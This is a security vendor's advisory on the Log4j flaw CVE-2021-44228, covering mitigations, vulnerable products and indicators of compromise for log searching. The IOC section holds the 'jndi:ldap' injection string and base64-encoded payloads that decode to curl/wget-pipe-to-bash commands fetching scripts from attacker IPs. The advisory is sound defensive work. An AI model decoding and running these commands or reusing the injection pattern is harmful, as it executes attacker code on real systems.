New Vulnerability in Log4J - CVE-2021-44228

by Tiago Henriques.

Friday, a new critical vulnerability in a software library in Log4J was discovered. This logging library is used across many different Java-based platforms and powers different parts of the internet.

At Coalition, our mission is to solve cyber risk. We continuously scan the internet to identify infrastructure assets vulnerable to different cyber security risks. Since the Log4j vulnerability was released, we quickly implemented a detection capability for the new vulnerability. We have run the new scanner on all Coalition cyber security insurance Policyholders and Coalition Control users. Additionally, we will contact all entities using vulnerable versions of the Log4j library or software that relies on Log4j.

What is Log4J?

Log4J is an open-source logging framework that developers use to record actions and activities within their applications. It is used by platforms such as: Minecraft, VMWare, Elasticsearch, Apple, Cloudflare, Amazon Web Services, and Tesla, along with various Apache platforms such as Struts, Druid, ActiveMQ, Flume, Hadoop and Kafka, among many others.

What does this mean for me?

Don't panic. If you are a Coalition policyholder, log into your Coalition Control account and check for a notification for you to remediate issues. Additionally, we are publishing and regularly updating the next section with platforms that are vulnerable to CVE-2021-44228.

Check whether you are running any of the vulnerable software internally in your network as Coalition Control only has visibility to assets exposed to the internet. After you have your list of assets, it is time to mitigate the issue.

Mitigation techniques

The following is a list of Log4J mitigations. The preferred method will offer maximum protection.

Preferred

Update to Log4J 2.16.0

This completely removes the affected JNDI component. As a result, this mitigation provides maximum protection against Log4J attacks.

Acceptable, but not preferred

Update to Log4J 2.15.0.

This release disabled the JNDI component by default. This means that the vector could be re-enabled at a later date. This mitigation option provides less protection and does allow for  the component to be re-enabled. There is a chance that future software vulnerabilities could enable a vector to re-enable this component.

Temporary only

Taken from the Log4J Bulletin:

Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

This method should only be used if none of the above mitigation methods are available to you. In some cases it is possible to remove the mitigations by restarting the affected software or operating system. Please consider this a temporary measure while working toward an upgrade to 2.16.0 of Log4j.

If you have a WAF in front of your web applications, make sure to deploy rules for filtering. Services like Cloudflare and AWS, and Google CloudArmor already have available pre-built rules. These won't stop every attack but will still be useful against more basic attacks.

Vulnerable Platforms

This section contains a list of platforms Coalition has identified as potentially vulnerable to CVE-2021-44228. For your major vendors not on this list, you should contact them and ask them the following questions:

  • Do you use any software that relies on Log4J ?
  • Have you executed any mitigations for CVE-2021-44228 ?
  • Did you do any investigation to confirm you have not been a victim to exploitation of CVE-2021-44228 ?

Known vulnerable platforms:

  • Okta RADIUS Server Agent, Okta On-Prem MFA Agent
  • Apache Struts, Solr, Druid, ActiveMQ, Flume, Hadoop, Kafka,Dubbo,Flink,Spark, Tapestry, Wicket
  • Redhat OpenShift Container Platform 4, OpenShift Container Platform 3.11, OpenStack Platform 13 (Queens), OpenShift Logging.
  • Grails
  • Ghidra
  • Minecraft
  • VMWare Horizon, VCenter, HCX, NSX-T Data Center, Unified Access Gateway, WorkspaceOne Access, Identify Manager, VRealize Operations, VRealize Operations cloud proxy, VRealize log insight, VRealize Automation, VRealize Lifecycle Manager, Telco Cloud Automation, Site Recovery Manager, Caron Black Cloud Workload Appliance, Carbon Black EDR Server, Tanzu GemFire, Tanzu Greenplum, Tanzu Operations Manager, Tanzu Application Service for VMs, Tanzu Kubernetes Grid Integrated Edition, Tanzu Observability by Wavefront Nozzle, Healthwatch for Tanzu Application service, Spring Cloud Services for Vmware Tanzu,Spring Cloud Gateway for Vmware Tanzu, Spring Cloud Gateway for Kubernetes, API Portal for VMWare Tanzu, Single Sign-on for VMWare Tanzu Application Service, App Metrics, Vmware vCenter Cloud Gateway, VMWare Tanzu SQL with MySQL for VMs, Vrealize Orchestrator

Potentially vulnerable — can use log4j or embeds log4j

  • Apache Tomcat
  • Dropwizard
  • Elastic Kibana
  • Hibernate
  • JavaServer Faces
  • Oracle ATG Web Commerce
  • Spring Framework

A more extensive list being updated by the cybersecurity community and twitter user @SwitHak which can be found here.

IOCs

Indicators of compromise (IOCs) are a list of signals we've been detecting that can be used to discover if your organization has already been attacked or compromised by this vulnerability. If you have logs, you can search for these strings to help discover if you've been compromised:

Domains:

bingsearchlib.com
dnslog.cn

IPs:

104.244.72.115
104.244.76.13
107.189.1.160
107.189.11.228
109.237.96.124
114.116.50.27
128.31.0.13
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
178.17.170.135
178.17.171.102
178.17.174.14
179.43.187.138
18.27.197.252
185.100.87.202
185.14.97.147
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.244
185.220.100.245
185.220.100.249
185.220.100.250
185.220.100.252
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.141
185.220.101.145
185.220.101.153
185.220.101.156
185.220.101.162
185.220.101.164
185.220.101.166
185.220.101.170
185.220.101.172
185.220.101.174
185.220.101.183
185.220.101.189
185.220.101.191
185.220.101.34
185.220.101.38
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.48
185.220.101.50
185.220.101.57
185.220.101.58
185.220.101.63
185.38.175.132
185.51.76.187
195.19.192.26
195.251.41.139
199.195.250.77
202.21.43.230
204.8.156.142
209.127.17.234
209.141.60.19
212.193.57.225
219.100.36.177
23.129.64.137
23.129.64.143
36.33.36.21
45.137.21.9
45.155.205.233
46.166.139.111
5.2.73.229
51.15.43.205
62.102.148.68
62.76.41.46
64.113.32.29
84.53.225.118
94.16.121.91

Strings:

jndi:ldap

/Basic/Command/Base64/

/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0Myl8YmFzaA==

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjUwOjgwODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODkuMTg4Ljc2LjI1MDo4MDgwKXxiYXNo